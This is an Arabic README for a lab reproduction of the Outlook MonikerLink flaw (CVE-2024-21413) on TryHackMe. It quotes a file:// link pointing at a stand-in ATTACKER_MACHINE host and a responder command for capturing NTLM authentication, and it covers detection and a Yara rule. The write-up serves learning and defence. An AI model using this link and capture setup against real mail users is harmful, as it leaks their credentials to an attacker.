
يحتوي هذا المستودع على ملاحظات بحثية ونموذج إثبات مفهوم (PoC) عالي المستوى للثغرة CVE-2024-21413، وهي ثغرة لوحظت في بعض عملاء البريد الإلكتروني عند معالجة روابط من نمط SMB/moniker المضمّنة في الرسائل. تم تنفيذ نموذج إثبات المفهوم (PoC) والتجارب الموثقة هنا في بيئة مختبرية خاضعة للتحكم على الأنظمة.
يعيد هذا المشروع إنتاج سلوك MonikerLink (CVE-2024-21413) في بيئة TryHackMe معزولة تمامًا لإظهار كيف يمكن لبعض تنسيقات الروابط التشعبية أن تجعل Outlook يعالج رابطًا بطريقة تكشف محاولات المصادقة أو تؤدي إلى مزيد من الاستغلال. الناتج هو PoC، ومجموعة ذات أولوية من الإجراءات التخفيفية واقتراحات الكشف التي يمكن لفرق الأمان تطبيقها. لم يتم استهداف أي أنظمة حية / غير مصرح بها.
| Tool / Skill | الغرض |
|---|---|
| Python | تطوير السكربتات |
| Linux (Kali) | النظام المستهدف |
| Metasploit | الاستغلال والوصول |
| TryHackMe Lab | بيئة خاضعة للتحكم |
هذا الكود كتبه CMNatic ويمكن العثور عليه هنا
على سبيل المثال، في السطر التالي “<a href=“file://ATTACKER_MACHINE/test!” استبدلت "ATTACKER_MACHINE" بعنوان IP الخاص بجهازي المهاجم، وفي السطر “server = smtplib.SMTP('MAILSERVER', 25)” غيرت "MAILSERVER" إلى عنوان IP الخاص بجهازي الضحية.
responder -I ens5
systemctl start systemd-resolved

يكشف إثبات المفهوم هذا عن فارق دقيق في طريقة تعامل Microsoft Outlook مع الروابط: إذ قد تفلت بعض روابط moniker من نمط file:// التي تشير إلى موارد SMB من التصفية القياسية في Outlook، وتثير محاولات مصادقة صادرة. السلوك الموضح هنا أُعيد إنتاجه في مختبر TryHackMe خاضع للتحكم الكامل، ويبرز كيف يمكن لتنسيقات روابط تبدو غير ضارة أن تخفي تفاعلات شبكية. على الرغم من إصدار تصحيحات من البائع وإرشادات للكشف، تظل الآليات الأساسية معقدة بسبب الاستخدامات المشروعة لنظامي moniker و file. والأهم أن النشاط الناتج عن إثبات المفهوم هذا يمكن ملاحظته على مستوى الشبكة (على سبيل المثال، في التقاط الحزم التي تعرض محاولات مصادقة NTLM)، مما يجعله قابلاً للتحليل الجنائي والتحقيق في الحوادث.
تم إنشاء قاعدة Yara بواسطة Florian Roth للكشف عن رسائل البريد الإلكتروني التي تحتوي على العنصر :file:\:.
